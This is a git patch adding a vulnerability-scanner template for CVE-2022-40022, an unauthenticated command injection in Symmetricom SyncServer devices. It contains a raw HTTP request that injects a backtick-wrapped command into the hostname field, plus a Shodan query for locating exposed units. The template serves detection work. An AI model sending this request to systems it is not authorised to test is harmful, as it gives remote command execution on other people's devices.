From 131e8bfb0c2a8dfdf4f3402530ce1ba9142adb37 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 22 Jun 2023 11:16:36 +0530 Subject: [PATCH] Create CVE-2022-40022.yaml --- http/cves/2022/CVE-2022-40022.yaml | 47 ++++++++++++++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 http/cves/2022/CVE-2022-40022.yaml diff --git a/http/cves/2022/CVE-2022-40022.yaml b/http/cves/2022/CVE-2022-40022.yaml new file mode 100644 index 0000000000..b2b7d07a70 --- /dev/null +++ b/http/cves/2022/CVE-2022-40022.yaml @@ -0,0 +1,47 @@ +id: CVE-2022-40022 + +info: + name: Symmetricom SyncServer Unauthenticated - Remote Command Execution + author: DhiyaneshDK + severity: critical + description: | + Microchip Technology (Microsemi) SyncServer S650 was discovered to contain a command injection vulnerability. + reference: + - http://packetstormsecurity.com/files/172907/Symmetricom-SyncServer-Unauthenticated-Remote-Command-Execution.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-40022 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-40022 + metadata: + max-request: 1 + shodan-query: html:"Symmetricom SyncServer" + verified: "true" + tags: cve,cve2022,syncserver,rce,unauth + +http: + - raw: + - | + POST /controller/ping.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{RootURL}}/controller/ping.php + + currentTab=ping&refreshMode=ðDirty=false&snmpCfgDirty=false&snmpTrapDirty=false&pingDirty=false&hostname=%60id%60&port=eth0&pingType=ping + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "uid=([0-9(a-z)]+)" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 302